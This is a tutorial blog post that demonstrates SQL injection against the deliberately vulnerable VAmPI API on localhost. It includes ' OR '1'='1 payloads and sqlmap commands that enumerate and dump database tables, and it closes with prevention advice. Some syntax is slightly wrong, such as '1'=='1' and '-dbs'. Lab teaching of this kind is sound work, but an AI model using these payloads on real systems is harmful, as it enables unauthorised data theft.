**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
The most basic way to describe a database is a table (or tables) of data. Data in these tables are stored in a defined structure, utilizing indexing to facilitate highly efficient query performance.
SQL is utilized for interacting with databases.
How to inject SQL injection?
Suppose an application allows users of a public web page to check their marketing preferences by entering their email addresses.
When a user searches for their preferences, their email address is inserted directly into the query; for example, if their email were test@email.com, the SQL query would look like this:
SELECT * FROM user_preferences WHERE email = ‘test@email.com’;
By injecting additional SQL code into the statement retrieving data, you can return a list of all email addresses that use this web page rather than just the details for your email.
SELECT * FROM user_preferences WHERE email = ‘test@email.com’ OR ‘1’==’1’;
As the input is not sanitized, you can pass additional SQL code into this query above by closing off the string with a single apostrophe mark (‘) and entering your own SQL. Using Boolean logic, you want the statement to be evaluated as accurate. This will allow you to return all rows instead of just one. An example of Boolean logic is OR 1=1 (since 1=1 is always authentic, all items will be returned).
Original user input: test@email.com
Malicious user input: test@email.com’ OR ‘1’==’1
Before the walkthrough install VAmPI and Postman if you have not installed them by clicking on the link below:
1.Understanding and Installing VAmPI – A Vulnerable REST API (Part 1) – Stratos Ally
2. Installing Postman: An API testing tool – Stratos Ally
Walkthrough of target API endpoint (manual): /users/v1/:username
- Retrieves user by username: /users/v1/ashish
- Break the API endpoint: /users/v1/ashish’
We broke the developers code and saw an error message which shows that SQL injection might be possible here.
- Write the command in API endpoint: /users/v1/’ OR ‘1’=’1
Output:
{
“username”: “name1”,
“email”: “mail1@mail.com”
}
We were able to exploit the API endpoint successfully and got the very first entry in the table using SQL injection.
SQLMap
SQLMap is a very popular open-source tool used for automating the exploitation of SQL injection. It’s widely recognized for its efficiency and ease of use in compromising database servers.
Key Features of SQLMap
- Automation: Streamlines the process of finding and exploiting SQL injection flaws.
- Database Compatibility: It is compatible with various DBMSs such as MySQL, PostgreSQL, Oracle, etc.
- We can accurately determine the type of DBMS in use.
- Data Extraction: Retrieves database names, tables, columns, and data.
- Operating System Interaction: Executes commands on the operating system level via out-of-band connections.
- Database Access: Provides options to connect to the database using credentials found during testing.
To learn more about SQLMap, write the command: sqlmap -h
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables
Walkthrough of target API endpoint (using SQLMap): /users/v1/:username
- Write the sqlmap command: sqlmap -u http://127.0.0.1:5000/users/v1/ashish
-u: denotes the url/API endpoint we want to target
It fetched us the result that the back-end DBMS is SQLite
- After finding out the database, lets enumerate the tables in SQLite.
Write the command: sqlmap -u http://127.0.0.1:5000/users/v1/ashish -dbs SQLite –tables
2 tables were found by SQLMap: books and users
- Now, we enumerate the columns of both these tables.
sqlmap -u http://127.0.0.1:5000/users/v1/ashish -dbs SQLite -T books,users –dump
–dump: it is used to retrieve the contents of the table.
Prevention
To mitigate the risk of SQL injection attacks, it’s essential to use a combination of manual and automated techniques.
- Implementing parameterized queries, stored procedures, and rigorous input validation are key steps.
- Regularly updating systems, monitoring for suspicious activities, and adhering to secure coding practices further enhance your defence.
By following these measures, you can ensure that your applications properly handle user inputs, safeguarding the integrity and security of your databases. The objective is to proactively secure your systems against potential SQL injection vulnerabilities, thereby maintaining robust security and protecting sensitive data.
